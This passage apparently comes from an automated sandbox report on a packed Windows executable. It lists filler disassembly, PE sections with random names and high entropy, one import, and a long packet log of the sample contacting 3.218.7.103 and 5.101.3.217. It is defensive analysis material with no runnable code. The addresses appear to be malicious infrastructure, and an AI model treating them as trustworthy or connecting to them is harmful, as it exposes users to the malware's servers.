                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al
                                          add byte ptr [eax], al

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x6dd05f0x73.idata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x6dc0000x1ac.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x708a000x688
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0xc3b3c80x10lyhwrnys
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0xc3b3780x18lyhwrnys
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          0x10000x6db0000x288a00302fa3d5477d34b6b8e8f343e07af9d3unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0x6dc0000x1ac0x200f364cf2025365378a947503d0a17f02fFalse0.580078125data4.598587805717438IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .idata 0x6dd0000x10000x2006363462e4ea156e03144265f6be7871eFalse0.166015625data1.1763897754724144IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          0x6de0000x39d0000x200a726e9e64557af7ef80c3eb0d51a46bbunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          lyhwrnys0xa7b0000x1c10000x1c060034e3cae9af8503b3e9ae15a0a190ca32False0.9945647912601059data7.95526963720531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          jcgkpoiz0xc3c0000x10000x400e8c898c7352eb3c29b3c6cb16b74c124False0.82421875data6.396697672498131IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .taggant0xc3d0000x30000x22001c23ef437f21143121d5a638b1b51edeFalse0.006548713235294118DOS executable (COM)0.019571456231530684IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                          Resources

                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_MANIFEST0xc3b3d80x152ASCII text, with CRLF line terminators0.6479289940828402

                                          Imports

                                          DLLImport
                                          kernel32.dlllstrcpy

                                          Network Behavior

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Dec 27, 2024 08:55:34.051603079 CET49724443192.168.2.63.218.7.103
                                          Dec 27, 2024 08:55:34.051678896 CET443497243.218.7.103192.168.2.6
                                          Dec 27, 2024 08:55:34.051753998 CET49724443192.168.2.63.218.7.103
                                          Dec 27, 2024 08:55:34.066699982 CET49724443192.168.2.63.218.7.103
                                          Dec 27, 2024 08:55:34.066732883 CET443497243.218.7.103192.168.2.6
                                          Dec 27, 2024 08:55:35.865438938 CET443497243.218.7.103192.168.2.6
                                          Dec 27, 2024 08:55:35.866058111 CET49724443192.168.2.63.218.7.103
                                          Dec 27, 2024 08:55:35.866081953 CET443497243.218.7.103192.168.2.6
                                          Dec 27, 2024 08:55:35.868272066 CET443497243.218.7.103192.168.2.6
                                          Dec 27, 2024 08:55:35.868351936 CET49724443192.168.2.63.218.7.103
                                          Dec 27, 2024 08:55:35.869673967 CET49724443192.168.2.63.218.7.103
                                          Dec 27, 2024 08:55:35.869904041 CET443497243.218.7.103192.168.2.6
                                          Dec 27, 2024 08:55:35.879151106 CET49724443192.168.2.63.218.7.103
                                          Dec 27, 2024 08:55:35.879158020 CET443497243.218.7.103192.168.2.6
                                          Dec 27, 2024 08:55:35.932681084 CET49724443192.168.2.63.218.7.103
                                          Dec 27, 2024 08:55:36.208420038 CET443497243.218.7.103192.168.2.6
                                          Dec 27, 2024 08:55:36.208523035 CET443497243.218.7.103192.168.2.6
                                          Dec 27, 2024 08:55:36.208630085 CET49724443192.168.2.63.218.7.103
                                          Dec 27, 2024 08:55:36.218487978 CET49724443192.168.2.63.218.7.103
                                          Dec 27, 2024 08:55:36.218532085 CET443497243.218.7.103192.168.2.6
                                          Dec 27, 2024 08:55:38.815815926 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:38.935592890 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:38.935866117 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:38.937199116 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:39.056976080 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.056996107 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.057015896 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.057027102 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.057077885 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.057079077 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:39.057099104 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.057130098 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:39.057147980 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:39.057166100 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.057185888 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.057228088 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:39.057243109 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:39.057244062 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.057296991 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.057301044 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:39.057349920 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:39.177120924 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.177139997 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.177161932 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.177171946 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.177187920 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.177197933 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.177310944 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:39.177357912 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:39.219293118 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.222793102 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:39.339231968 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.339342117 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:39.383636951 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.503197908 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.503355980 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:39.703154087 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.703324080 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:39.947182894 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:39.947243929 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.023097992 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.023307085 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.023392916 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.066791058 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.066937923 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.143083096 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.143124104 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.143250942 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.143318892 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.143353939 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.143392086 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.143419981 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.143508911 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.143562078 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.143564939 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.143613100 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.143722057 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.143734932 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.143773079 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.143799067 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.143867016 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.143877983 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.143924952 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.143975973 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144023895 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.144052029 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144099951 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.144166946 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144222021 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.144223928 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144277096 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.144331932 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144382000 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144476891 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144562960 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144625902 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144701004 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144815922 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144871950 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.144941092 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.145035028 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.145179033 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.145270109 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.145273924 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.145319939 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.145343065 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.145384073 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.145402908 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.145443916 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.145450115 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.145490885 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.145512104 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.145558119 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.145582914 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.145629883 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.186703920 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.186837912 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.227355003 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.227432013 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.263036013 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.263061047 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.263143063 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.263165951 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.263219118 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.263252020 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.263292074 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.263478041 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.263492107 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.263659954 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.263700008 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.263798952 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.263840914 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.263946056 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.264024973 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.264123917 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.264162064 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.264247894 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.264275074 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.264575005 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.264884949 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.264895916 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.264951944 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.265002012 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265059948 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.265116930 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265157938 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265166998 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.265168905 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265212059 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.265259981 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265273094 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265317917 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.265405893 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265418053 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265484095 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265491009 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.265518904 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265536070 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.265573025 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.265585899 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265614986 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265635967 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.265783072 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265820026 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265975952 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.265993118 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266123056 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266171932 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266182899 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266192913 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266282082 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266293049 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266359091 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266367912 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266402960 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266412020 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266450882 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266459942 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266544104 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266554117 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266645908 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266654968 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266712904 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266736984 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266807079 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266871929 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.266911030 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.267002106 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.267013073 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.267024994 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.267076969 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.306536913 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.306576014 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.347063065 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.382785082 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.382828951 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.382946014 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.383021116 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.383203030 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.383261919 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.383290052 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.383667946 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.383784056 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.384120941 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.384324074 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.384462118 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.384497881 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.384648085 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.384809971 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.384846926 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.385101080 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.385211945 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.385262966 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.385490894 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.385502100 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.385516882 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.385628939 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.385699034 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.385895014 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.385905027 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386065960 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386109114 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386229038 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386295080 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386401892 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386456013 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386565924 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386610031 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386723042 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386785030 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386868954 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.386893988 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387020111 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387088060 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387212992 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387258053 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387355089 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387398958 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387514114 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387533903 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387698889 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387769938 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387914896 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.387926102 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388026953 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388036966 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388120890 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388147116 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388274908 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388322115 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388434887 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388444901 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388540030 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388550043 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388650894 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388706923 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.388807058 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.389122963 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.389195919 CET4973680192.168.2.65.101.3.217
                                          Dec 27, 2024 08:55:40.503360987 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.503380060 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.503392935 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.503535986 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.503556013 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.503659964 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.503694057 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.503828049 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.503865004 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.503989935 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504012108 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504194975 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504316092 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504383087 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504422903 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504494905 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504525900 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504616976 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504643917 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504708052 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504749060 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504846096 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504854918 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504952908 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.504998922 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505062103 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505094051 CET80497365.101.3.217192.168.2.6
                                          Dec 27, 2024 08:55:40.505213022 CET80497365.101.3.217192.168.2.6
